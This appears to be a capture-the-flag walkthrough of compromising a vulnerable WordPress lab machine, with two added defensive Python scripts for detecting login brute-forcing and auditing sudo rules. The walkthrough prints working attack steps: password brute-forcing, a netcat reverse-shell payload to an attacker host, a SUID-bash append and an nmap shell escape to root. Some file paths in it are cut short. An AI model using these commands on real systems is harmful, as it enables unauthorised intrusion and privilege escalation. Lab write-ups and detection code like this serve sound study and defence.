1. Network discovery
nmap -sn

The target is

2. Host file

Reading the technical information, I have to edit the hosts file so the hostname wordy resolves to the target.

nano /etc/hosts

3. Port scan

nmap -Pn -p1000-

There are 2 open ports: 22 and 80.

4. OS and service scan

nmap -A -p22,80

The scan revealed that this site runs WordPress version 5.1.1.

5. Vuln scan

nmap --script vuln -p22,80

I have some possible vulnerabilities plus a list of usernames.

6. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://wordy/ -x php,txt,html,sh,cgi -q

7. WPscan

wpscan --url http://wordy/ -et -ep -eu

A similar result to nmap’s vuln scan.

8. Nmap WordPress enum script

nmap -sV --script http-wordpress-enum

This lists the themes and plugins.

9. Access HTTP site


Explore everything

10. Exploitation

After searching for exploits for Apache 2.4.5 and WordPress 5.5.1, I found nothing useful.

I'll start guessing login credentials with the username as the password (some people use the same string for both fields):

admin : admin
graham : graham
mark : mark
sarah : sarah
jens : jens

All failed.

Since there's nothing more I can do (as far as I know), I'll have to brute-force the username and password.

Starting with the clue, I won't spend forever cracking these; I'll use it.

NOTE: my rockyou.txt is located on the Desktop.

cat /root/Desktop/rockyou.txt | grep k01 > passwords.txt

Crack the password using wpscan:

wpscan --url http://wordy/ -et -ep -eu -P passwords.txt

After waiting for a while, I got a username and password:

mark : helpdesk01
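From the server side, the wpscan run above leaves an easily spotted trace: a burst of POSTs to wp-login.php from one source IP, followed by the 302 redirect WordPress sends on a successful login. The detector below is an added example written for this page, not code from the original walkthrough; the log lines are constructed, and the 20-attempts-in-60-seconds threshold is an assumption a defender would tune to their own traffic.

```python
"""Flag password-guessing bursts against wp-login.php in Apache access logs.

Added example, not part of the original walkthrough. The log lines are
constructed; the threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format, reduced to the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Per source IP, count POSTs to /wp-login.php in the busiest `window`.

    WordPress answers a failed login with 200 (the form again) and a successful
    one with a 302 redirect, so a 302 inside a burst is the guess that landed.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == "/wp-login.php":
            posts[rec["ip"]].append((rec["ts"], rec["status"]))
    hits = {}
    for ip, events in posts.items():
        events.sort()
        start, peak = 0, 0
        for end in range(len(events)):          # sliding window over timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[ip] = {"attempts": len(events), "peak_in_window": peak,
                        "success": any(st == 302 for _, st in events)}
    return hits


def build_sample_log():
    """Constructed log: one attacker hammering wp-login.php, one normal visitor."""
    base = datetime(2024, 3, 10, 12, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 2041 "-" "constructed-ua"'

    lines = [line("10.0.0.9", 0, "GET", "/", 200),
             line("10.0.0.9", 5, "POST", "/wp-login.php", 200),   # one typo, then success
             line("10.0.0.9", 9, "POST", "/wp-login.php", 302)]
    lines += [line("10.0.0.5", i, "POST", "/wp-login.php", 200) for i in range(25)]
    lines.append(line("10.0.0.5", 25, "POST", "/wp-login.php", 302))
    return lines


if __name__ == "__main__":
    for ip, info in find_bruteforce(build_sample_log()).items():
        print(ip, info)
```

Run against a real access.log by passing `open("/var/log/apache2/access.log")` instead of the sample; the "success" flag is what turns a noisy alert into a "credentials are compromised, reset them" one.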

There's no function that lets me edit a PHP file to get a reverse shell.

Moving on to the plugins, they may reveal some vulnerabilities.

Starting with akismet.

Edit the script to match our scenario.


Next, user-role-editor 4.24. I came across this; it's a custom script for the Metasploit framework.

I used this as a guide to import a custom script.

Let’s try

msfconsole
use exploit/remote/http/wordpress/44595
show options
set username mark
set password helpdesk01
set rhosts wordy
run


Back on the site, there's one more plugin left: 'Activity Monitor'.

Googling it, I found this script to get a reverse shell.

Prepare a listener on port 1234:

rlwrap nc -lvp 1234

Edit the command

nc <attacker ip> 1234 -e /bin/bash

Open the script and click ‘Submit request’

Back at the listener, I now have a shell, but I need a TTY shell for convenience.

I'll try to get it with python:

which python
python -c 'import pty;pty.spawn("/bin/bash");'

11. Privilege escalation

Exploring /home, I came across 'things-to-do.txt' in /home/mark/stuff/

cat things-to-do.txt

Now I have graham's password.

Change user to graham:

su graham
<password>

Verify sudo

sudo -l

I can run this file as user 'jens'.

Read the file first.

cat /home/jens/

My idea is that this script belongs to jens and I can run it as jens without supplying any password. So I can edit it and append some commands to get a /bin/bash shell belonging to jens.

echo "cp /bin/bash /tmp/rootbash" >> /home/jens/backups.sh
echo "chmod +xs /tmp/rootbash" >> /home/jens/
echo "/tmp/rootbash -p" >> /home/jens/


cat /home/jens/

Run the sudo command

sudo -u jens /home/jens/

Now I’m jens.

Verify sudo again.

sudo -l

jens can run the nmap command with sudo.

Looking up in the GTFOBins guide, I have 2 options.

I'll start with the b. option.

sudo nmap --interactive

--interactive isn't available in recent nmap versions, so I'll try the a. option instead.

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
whoami

Now, I’m root.
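Two weaknesses carried this privilege escalation: a NOPASSWD sudo rule whose target script the invoking user could edit, and a sudo rule on nmap, a binary GTFOBins lists as a shell escape. The audit below is an added example written for this page, not code from the walkthrough or from any tool it uses. It parses constructed sudoers lines and checks them against files it creates in a temp directory, so the usernames, uids, paths and the short shell-escape list are all assumptions.

```python
"""Audit sudoers rules for the two weaknesses used in this walkthrough:
a rule whose target script is writable by the invoking user, and a rule
granting a binary with a known shell escape (e.g. nmap --script).

Added example, not part of the original walkthrough. The rules, usernames,
uids and files below are constructed in a temp directory so it runs offline.
"""
import os
import re
import stat
import tempfile

# Illustrative subset of binaries GTFOBins documents as offering a shell escape
# under sudo; a real audit would load the full list.
SHELL_ESCAPE_BINS = {"nmap", "vim", "vi", "find", "less", "more", "awk",
                     "python", "python3", "perl", "bash", "sh"}

# user  host=(runas)  [TAG: ...]  command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rule(line):
    """Parse one sudoers rule; returns None for lines that are not rules."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    cmds = [c.strip().split()[0] for c in m.group("cmds").split(",") if c.strip()]
    return {"user": m.group("user"), "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in m.group("tags"), "cmds": cmds}


def writable_by(path, uid, gids):
    """True if an account with (uid, gids) can modify `path` by ownership or mode bits."""
    st = os.stat(path)
    if st.st_uid == uid:              # the owner can always chmod, so treat as writable
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rules(rules, users):
    """users: {name: (uid, set_of_gids)}. Returns one finding record per command."""
    report = []
    for line in rules:
        rule = parse_rule(line)
        if not rule:
            continue
        uid, gids = users[rule["user"]]
        for cmd in rule["cmds"]:
            findings = []
            if cmd == "ALL":
                findings.append("unrestricted")
            else:
                if os.path.basename(cmd) in SHELL_ESCAPE_BINS:
                    findings.append("shell-escape")
                if os.path.exists(cmd):
                    if writable_by(cmd, uid, gids):
                        findings.append("writable-target")
                    if writable_by(os.path.dirname(cmd), uid, gids):
                        findings.append("writable-parent-dir")   # file could be replaced
                else:
                    findings.append("missing-target")
            report.append({"user": rule["user"], "runas": rule["runas"],
                           "cmd": cmd, "nopasswd": rule["nopasswd"],
                           "findings": findings})
    return report


def demo():
    """Recreate the walkthrough's two rules against constructed files."""
    home = tempfile.mkdtemp()           # stands in for /home/jens and /usr/bin
    backups = os.path.join(home, "backups.sh")
    with open(backups, "w") as f:
        f.write("#!/bin/bash\ntar czf /tmp/backup.tgz /var/www\n")
    os.chmod(backups, 0o777)            # the misconfiguration: anyone can edit it
    nmap = os.path.join(home, "nmap")
    with open(nmap, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    os.chmod(nmap, 0o755)
    os.chmod(home, 0o755)
    # Constructed uids, offset so they never equal the account running this demo.
    base = os.getuid() + 1000
    users = {"graham": (base + 1, {base + 1}), "jens": (base + 2, {base + 2})}
    rules = [
        f"graham ALL=(jens) NOPASSWD: {backups}",
        f"jens   ALL=(root) NOPASSWD: {nmap}",
    ]
    return audit_rules(rules, users)


if __name__ == "__main__":
    for r in demo():
        print(r)
```

On a real host the rules come from /etc/sudoers (or `sudo -l` output) and the user table from the passwd database. The fix for the first finding is to make the script root-owned and not writable by anyone else; for the second, drop the rule or restrict nmap to a fixed wrapper that does not pass through --script.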

Get the flag

cd /root
ls -la
cat theflag.txt